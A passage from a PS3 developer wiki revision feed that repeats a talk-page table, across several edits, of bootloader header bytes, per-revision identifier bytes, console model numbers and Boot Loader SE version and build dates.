18&lt;/code&gt;&amp;nbsp; || {{CECHH}} || Boot Loader SE Version 2.1.0 ...(Build ID: 2709,28222, .........Build Data: 2007-12-05_13:32:28)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E F4&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;E6 44 A0 75 B6 0B 79 96 C1 29 7A A0&lt;/code&gt;&amp;nbsp; || {{CECHJ}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E E3&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;ED 4C 79 D6 5D 60 28 76 FF AD A6 FD&lt;/code&gt;&amp;nbsp; || {{CECHH}} || &lt;!--// Boot Loader SE Version //--&gt; 2.2.0 / &lt;!--// Build ID //--&gt;2883,30440 / &lt;!--// Build Date //--&gt;2008-03-18_17:28:18<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E E3&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;7B 09 CB EE 00 2F AF 51 59 F8 D5 A8&lt;/code&gt;&amp;nbsp; || {{CECHC}}&lt;br /&gt;{{CECHH}}&lt;br /&gt;{{CECHK}} || &lt;!--// Boot Loader SE Version //--&gt; 2.3.5 / &lt;!--// Build ID //--&gt;3034,32025 / &lt;!--// Build Date //--&gt;2008-05-12_15:29:27<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E AB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;B1 94 34 A3 3C F1 C8 66 DF 42 0E 50&lt;/code&gt;&amp;nbsp; || {{CECHL}}&lt;br /&gt;{{CECHP}}&lt;br /&gt;{{GECR1500}} || Boot Loader SE Version 2.4.5 ...(Build ID: 3163,33519, .........Build Data: 2008-07-14_20:31:16)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E AB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;83 EF B9 76 C4 DE D1 35 32 7C D3 77&lt;/code&gt;&amp;nbsp; || {{CECHL}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E AB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;61 D1 9B A5 41 68 16 3C 01 9F 88 4B&lt;/code&gt;&amp;nbsp; || {{DECHJ00}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E B3&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;92 AC 2C 21 57 A5 77 C8 4D DF EC DB&lt;/code&gt;&amp;nbsp; || {{CECHL}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 13&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;41 F7 93 C7 09 41 8F 93 89 44 BA 7A&lt;/code&gt;&amp;nbsp; || {{CECHL}}&lt;br /&gt;{{CECH2000}}&lt;br /&gt;{{DECR1400}} || Boot Loader SE Version 2.7.0 ...(Build ID: 3517,38879, .........Build Date: 2009-03-24_23:51:55)&lt;br /&gt;Initial version for DECR-1400 dropped sc_dev_access support<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 13&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;FA 46 EC 86 57 0F CA AA 06 4E 8A 86&lt;/code&gt;&amp;nbsp; || {{CECH2000}} || Boot Loader SE Version 2.8.5 ...(Build ID: 3640,40665, .........Build Date: 2009-06-29_21:04:39)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 13&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;F5 A2 21 B5 C0 5F 21 42 01 97 9D AA&lt;/code&gt;&amp;nbsp; || {{CECH2000}} || Boot Loader SE Version 3.0.0 ...(Build ID: 3684,41778, .........Build Date: 2009-08-28_22:53:58)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 3B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;77 80 B1 34 B6 DF 25 8A 1A BB AB 4D&lt;/code&gt;&amp;nbsp; || {{CECH2000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 4B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;EF B3 45 5D 6A 9F D7 51 00 5E 34 BC&lt;/code&gt;&amp;nbsp; || {{CECH2100}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 4B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;53 92 1C E7 F7 33 41 76 9B 7A 1E D6&lt;/code&gt;&amp;nbsp; || {{CECH2100}}&lt;br /&gt;{{CECH2500}}&lt;br /&gt;{{DECR1400}} || Boot Loader SE Version 3.3.0 ...(Build ID: 3881,45141, .........Build Date: 2010-04-13_22:09:13)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 4B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;CB 9E 15 24 28 B4 4F D2 F9 3F BC 43&lt;/code&gt;&amp;nbsp; || {{CECHC}}&lt;br /&gt;{{CECHE}}&lt;br /&gt;{{CECH2000}}&lt;br /&gt;{{CECH2500}} || Boot Loader SE Version 3.4.0 ...(Build ID: 3932,45679, .........Build Date: 2010-06-07_23:08:10)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 53&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;53 E6 A0 BB B0 AF A2 00 67 D0 B3 9A&lt;/code&gt;&amp;nbsp; || {{CECH2500}} || &lt;!--// Boot Loader SE Version //--&gt; 3.5.0 / &lt;!--// Build ID //--&gt;4002,46268 / &lt;!--// Build Date //--&gt;2010-09-21_18:48:40&lt;br /&gt;Enforced 0003004FFFFFFFFF+<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 5B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;AA 3A EA 6E 3D A0 9A 58 1E 1E 21 00&lt;/code&gt;&amp;nbsp; || {{CECH2500}} || &lt;!--// Boot Loader SE Version //--&gt; 3.5.6 / &lt;!--// Build ID //--&gt;4275,46986 / &lt;!--// Build Date //--&gt;2011-02-15_19:06:04&lt;br /&gt;Enforced 00030055FFFFFFFF+<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F FB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;C5 A4 27 71 EE 5E 21 9A 3B FC 2C 45&lt;/code&gt;&amp;nbsp; || {{CECH2500}} || Should be Enforced 0003005FFFFFFFFF+<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F FB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;13 EC A7 4A 8E 14 D4 73 12 91 28 E8&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F FB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;63 B9 D9 81 30 DB 7B B0 F3 9D 12 4F&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 03&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;BB CC BF 29 EC D8 02 84 4E B2 8A E6&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 0B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;2E 60 41 04 D9 43 D1 B5 34 D4 C5 F5&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || minver 3.72<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 1B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;1F DC 1E 2D F0 0D A3 67 01 E2 F8 F6&lt;/code&gt;&amp;nbsp; || {{CECH4000}} || <br /> |-<br /> |}</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Talk:Flash:bootldr&diff=41390 Talk:Flash:bootldr 2016-03-24T19:54:51Z <p>Mathieulh: /* Per revision key */ fixed an entry according to chronological order</p> <hr /> <div>== Per revision key ==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! &lt;abbr title=&quot;datasize=(header*0x10)+0x40&quot;&gt;header&lt;/abbr&gt;&lt;small&gt;&lt;br /&gt;NOR:0xFC0000&lt;br /&gt;NAND:0x0&lt;/small&gt; !! rev&lt;small&gt;&lt;br /&gt;NOR:0xFC0004&lt;br /&gt;NAND:0x4&lt;/small&gt; !! SKU !! notes<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 28 BE&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;C0 2E 2F EA F6 1C A6 F1 CC C8 8B 5F&lt;/code&gt;&amp;nbsp; || {{CEB-2030}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2C FE&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;80 5B F2 D9 AC D2 00 61 B6 99 BB 96&lt;/code&gt;&amp;nbsp; || {{DEH-Z1010}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 80&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;F2 C2 E4 E5 CC 02 FB 99 7C 50 90 82&lt;/code&gt;&amp;nbsp; || {{DECR-1000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 80&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;44 48 90 DD 19 2C 91 2D BB 99 6F C8&lt;/code&gt;&amp;nbsp; || {{DECR-1000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 7F&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;12 1D 73 39 4A F2 98 81 F8 D6 B1 8C&lt;/code&gt;&amp;nbsp; || {{DEH-H1001-D}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 1A&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;99 02 B3 13 C2 80 B8 35 AA 03 3F FE&lt;/code&gt;&amp;nbsp; || {{DEH-H1000A-E}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 2A&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;5C E4 63 CD 5C 9E B6 7A FE A0 1B 54&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{CECHB}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 2A&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;1C 21 81 C8 EA 41 86 5C 8B 33 8A EF&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{DECHA}} || Boot Loader SE Version 1.0.0 ...(Build ID: 1673,16934, .........Build Data: 2006-10-30_12:39:57)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 44&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;3F F1 1F 14 C3 42 44 3C 88 B1 8E 90&lt;/code&gt;&amp;nbsp; || {{CECHC}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 37&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;F9 96 D8 4E 1A 9D 50 BF 97 F4 A0 CE&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{CECHC}} || Boot Loader SE Version 1.5.0 ...(Build ID: 1798,18531, .........Build Data: 2007-01-10_12:09:26)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 37&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;BC 30 D5 52 4B 74 99 65 CF 95 AE 5F&lt;/code&gt;&amp;nbsp; || {{CECHC}} || Boot Loader SE Version 1.5.0 ...(Build ID: 1943,19890, .........Build Data: 2007-02-22_15:52:05)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 3F&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;04 AD 56 18 64 8D 49 94 23 8F B8 A1&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{CECHC}}&lt;br /&gt;{{CECHE}} || &lt;!--// Boot Loader SE Version //--&gt; 1.6.0 / &lt;!--// Build ID //--&gt;2040,21378 / &lt;!--// Build Date //--&gt;2007-04-17_20:46:43<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E 8C&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;31 B5 9A 07 2E D4 5C B5 68 08 C2 FC&lt;/code&gt;&amp;nbsp; || {{CECHG}}&lt;br /&gt;{{GECR1100}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 1C&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;06 5B 86 0C 5C F7 6A C4 59 8D D7 B4&lt;/code&gt;&amp;nbsp; || {{CECHE}}&lt;br /&gt;{{CECHG}}&lt;br /&gt;{{CECHH}} || &lt;!--// Boot Loader SE Version //--&gt; 1.9.7 / &lt;!--// Build ID //--&gt;2588,26593 / &lt;!--// Build Date //--&gt;2007-10-01_16:19:11 &lt;br&gt; first [[NOR]] {{CEX}} consoles (minver 2.30)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E F4&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;89 EF FD 15 B3 85 0E 3B 2A 73 44 84&lt;/code&gt;&amp;nbsp; || {{CECHG}}&lt;br /&gt;{{CECHH}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E F4&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;6E ED 04 A0 4E 41 53 2A C1 23 C7 18&lt;/code&gt;&amp;nbsp; || {{CECHH}} || Boot Loader SE Version 2.1.0 ...(Build ID: 2709,28222, .........Build Data: 2007-12-05_13:32:28)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E F4&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;E6 44 A0 75 B6 0B 79 96 C1 29 7A A0&lt;/code&gt;&amp;nbsp; || {{CECHJ}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E E3&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;ED 4C 79 D6 5D 60 28 76 FF AD A6 FD&lt;/code&gt;&amp;nbsp; || {{CECHH}} || &lt;!--// Boot Loader SE Version //--&gt; 2.2.0 / &lt;!--// Build ID //--&gt;2883,30440 / &lt;!--// Build Date //--&gt;2008-03-18_17:28:18<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E E3&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;7B 09 CB EE 00 2F AF 51 59 F8 D5 A8&lt;/code&gt;&amp;nbsp; || {{CECHC}}&lt;br /&gt;{{CECHH}}&lt;br /&gt;{{CECHK}} || &lt;!--// Boot Loader SE Version //--&gt; 2.3.5 / &lt;!--// Build ID //--&gt;3034,32025 / &lt;!--// Build Date //--&gt;2008-05-12_15:29:27<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E AB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;B1 94 34 A3 3C F1 C8 66 DF 42 0E 50&lt;/code&gt;&amp;nbsp; || {{CECHL}}&lt;br /&gt;{{CECHP}}&lt;br /&gt;{{GECR1500}} || Boot Loader SE Version 2.4.5 ...(Build ID: 3163,33519, .........Build Data: 2008-07-14_20:31:16)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E AB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;83 EF B9 76 C4 DE D1 35 32 7C D3 77&lt;/code&gt;&amp;nbsp; || {{CECHL}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E AB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;61 D1 9B A5 41 68 16 3C 01 9F 88 4B&lt;/code&gt;&amp;nbsp; || {{DECHJ00}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E B3&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;92 AC 2C 21 57 A5 77 C8 4D DF EC DB&lt;/code&gt;&amp;nbsp; || {{CECHL}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 13&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;41 F7 93 C7 09 41 8F 93 89 44 BA 7A&lt;/code&gt;&amp;nbsp; || {{CECHL}}&lt;br /&gt;{{CECH2000}}&lt;br /&gt;{{DECR1400}} || Boot Loader SE Version 2.7.0 ...(Build ID: 3517,38879, .........Build Date: 2009-03-24_23:51:55) // Initial version for DECR-1400 dropped sc_dev_access support<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 13&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;FA 46 EC 86 57 0F CA AA 06 4E 8A 86&lt;/code&gt;&amp;nbsp; || {{CECH2000}} || Boot Loader SE Version 2.8.5 ...(Build ID: 3640,40665, .........Build Date: 2009-06-29_21:04:39)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 13&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;F5 A2 21 B5 C0 5F 21 42 01 97 9D AA&lt;/code&gt;&amp;nbsp; || {{CECH2000}} || Boot Loader SE Version 3.0.0 ...(Build ID: 3684,41778, .........Build Date: 2009-08-28_22:53:58)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 3B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;77 80 B1 34 B6 DF 25 8A 1A BB AB 4D&lt;/code&gt;&amp;nbsp; || {{CECH2000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 4B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;EF B3 45 5D 6A 9F D7 51 00 5E 34 BC&lt;/code&gt;&amp;nbsp; || {{CECH2100}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 4B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;53 92 1C E7 F7 33 41 76 9B 7A 1E D6&lt;/code&gt;&amp;nbsp; || {{CECH2100}}&lt;br /&gt;{{CECH2500}}&lt;br /&gt;{{DECR1400}} || Boot Loader SE Version 3.3.0 ...(Build ID: 3881,45141, .........Build Date: 2010-04-13_22:09:13)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 4B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;CB 9E 15 24 28 B4 4F D2 F9 3F BC 43&lt;/code&gt;&amp;nbsp; || {{CECHC}}&lt;br /&gt;{{CECHE}}&lt;br /&gt;{{CECH2000}}&lt;br /&gt;{{CECH2500}} || Boot Loader SE Version 3.4.0 ...(Build ID: 3932,45679, .........Build Date: 2010-06-07_23:08:10)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 53&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;53 E6 A0 BB B0 AF A2 00 67 D0 B3 9A&lt;/code&gt;&amp;nbsp; || {{CECH2500}} || &lt;!--// Boot Loader SE Version //--&gt; 3.5.0 / &lt;!--// Build ID //--&gt;4002,46268 / &lt;!--// Build Date //--&gt;2010-09-21_18:48:40&lt;br /&gt;Enforced 0003004FFFFFFFFF+<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 5B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;AA 3A EA 6E 3D A0 9A 58 1E 1E 21 00&lt;/code&gt;&amp;nbsp; || {{CECH2500}} || &lt;!--// Boot Loader SE Version //--&gt; 3.5.6 / &lt;!--// Build ID //--&gt;4275,46986 / &lt;!--// Build Date //--&gt;2011-02-15_19:06:04&lt;br /&gt;Enforced 00030055FFFFFFFF+<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F FB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;C5 A4 27 71 EE 5E 21 9A 3B FC 2C 45&lt;/code&gt;&amp;nbsp; || {{CECH2500}} || Should be Enforced 0003005FFFFFFFFF+<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F FB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;13 EC A7 4A 8E 14 D4 73 12 91 28 E8&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F FB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;63 B9 D9 81 30 DB 7B B0 F3 9D 12 4F&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 03&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;BB CC BF 29 EC D8 02 84 4E B2 8A E6&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 0B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;2E 60 41 04 D9 43 D1 B5 34 D4 C5 F5&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || minver 3.72<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 1B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;1F DC 1E 2D F0 0D A3 67 01 E2 F8 F6&lt;/code&gt;&amp;nbsp; || {{CECH4000}} || <br /> |-<br /> |}</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Talk:Flash:bootldr&diff=41389 Talk:Flash:bootldr 2016-03-24T19:51:49Z <p>Mathieulh: /* Per revision key */ Added more details, removed an invalid/incorrect entry</p> <hr /> <div>== Per revision key ==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! &lt;abbr title=&quot;datasize=(header*0x10)+0x40&quot;&gt;header&lt;/abbr&gt;&lt;small&gt;&lt;br /&gt;NOR:0xFC0000&lt;br /&gt;NAND:0x0&lt;/small&gt; !! rev&lt;small&gt;&lt;br /&gt;NOR:0xFC0004&lt;br /&gt;NAND:0x4&lt;/small&gt; !! SKU !! notes<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 28 BE&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;C0 2E 2F EA F6 1C A6 F1 CC C8 8B 5F&lt;/code&gt;&amp;nbsp; || {{CEB-2030}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2C FE&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;80 5B F2 D9 AC D2 00 61 B6 99 BB 96&lt;/code&gt;&amp;nbsp; || {{DEH-Z1010}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 80&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;F2 C2 E4 E5 CC 02 FB 99 7C 50 90 82&lt;/code&gt;&amp;nbsp; || {{DECR-1000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 80&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;44 48 90 DD 19 2C 91 2D BB 99 6F C8&lt;/code&gt;&amp;nbsp; || {{DECR-1000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 7F&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;12 1D 73 39 4A F2 98 81 F8 D6 B1 8C&lt;/code&gt;&amp;nbsp; || {{DEH-H1001-D}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 1A&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;99 02 B3 13 C2 80 B8 35 AA 03 3F FE&lt;/code&gt;&amp;nbsp; || {{DEH-H1000A-E}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 2A&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;5C E4 63 CD 5C 9E B6 7A FE A0 1B 54&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{CECHB}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 2A&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;1C 21 81 C8 EA 41 86 5C 8B 33 8A EF&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{DECHA}} || Boot Loader SE Version 1.0.0 ...(Build ID: 1673,16934, .........Build Data: 2006-10-30_12:39:57)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 44&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;3F F1 1F 14 C3 42 44 3C 88 B1 8E 90&lt;/code&gt;&amp;nbsp; || {{CECHC}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 37&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;BC 30 D5 52 4B 74 99 65 CF 95 AE 5F&lt;/code&gt;&amp;nbsp; || {{CECHC}} || Boot Loader SE Version 1.5.0 ...(Build ID: 1943,19890, .........Build Data: 2007-02-22_15:52:05)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 37&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;F9 96 D8 4E 1A 9D 50 BF 97 F4 A0 CE&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{CECHC}} || Boot Loader SE Version 1.5.0 ...(Build ID: 1798,18531, .........Build Data: 2007-01-10_12:09:26)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 3F&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;04 AD 56 18 64 8D 49 94 23 8F B8 A1&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{CECHC}}&lt;br /&gt;{{CECHE}} || &lt;!--// Boot Loader SE Version //--&gt; 1.6.0 / &lt;!--// Build ID //--&gt;2040,21378 / &lt;!--// Build Date //--&gt;2007-04-17_20:46:43<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E 8C&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;31 B5 9A 07 2E D4 5C B5 68 08 C2 FC&lt;/code&gt;&amp;nbsp; || {{CECHG}}&lt;br /&gt;{{GECR1100}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 1C&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;06 5B 86 0C 5C F7 6A C4 59 8D D7 B4&lt;/code&gt;&amp;nbsp; || {{CECHE}}&lt;br /&gt;{{CECHG}}&lt;br /&gt;{{CECHH}} || &lt;!--// Boot Loader SE Version //--&gt; 1.9.7 / &lt;!--// Build ID //--&gt;2588,26593 / &lt;!--// Build Date //--&gt;2007-10-01_16:19:11 &lt;br&gt; first [[NOR]] {{CEX}} consoles (minver 2.30)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E F4&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;89 EF FD 15 B3 85 0E 3B 2A 73 44 84&lt;/code&gt;&amp;nbsp; || {{CECHG}}&lt;br /&gt;{{CECHH}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E F4&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;6E ED 04 A0 4E 41 53 2A C1 23 C7 18&lt;/code&gt;&amp;nbsp; || {{CECHH}} || Boot Loader SE Version 2.1.0 ...(Build ID: 2709,28222, .........Build Data: 2007-12-05_13:32:28)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E F4&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;E6 44 A0 75 B6 0B 79 96 C1 29 7A A0&lt;/code&gt;&amp;nbsp; || {{CECHJ}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E E3&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;ED 4C 79 D6 5D 60 28 76 FF AD A6 FD&lt;/code&gt;&amp;nbsp; || {{CECHH}} || &lt;!--// Boot Loader SE Version //--&gt; 2.2.0 / &lt;!--// Build ID //--&gt;2883,30440 / &lt;!--// Build Date //--&gt;2008-03-18_17:28:18<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E E3&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;7B 09 CB EE 00 2F AF 51 59 F8 D5 A8&lt;/code&gt;&amp;nbsp; || {{CECHC}}&lt;br /&gt;{{CECHH}}&lt;br /&gt;{{CECHK}} || &lt;!--// Boot Loader SE Version //--&gt; 2.3.5 / &lt;!--// Build ID //--&gt;3034,32025 / &lt;!--// Build Date //--&gt;2008-05-12_15:29:27<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E AB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;B1 94 34 A3 3C F1 C8 66 DF 42 0E 50&lt;/code&gt;&amp;nbsp; || {{CECHL}}&lt;br /&gt;{{CECHP}}&lt;br /&gt;{{GECR1500}} || Boot Loader SE Version 2.4.5 ...(Build ID: 3163,33519, .........Build Data: 2008-07-14_20:31:16)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E AB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;83 EF B9 76 C4 DE D1 35 32 7C 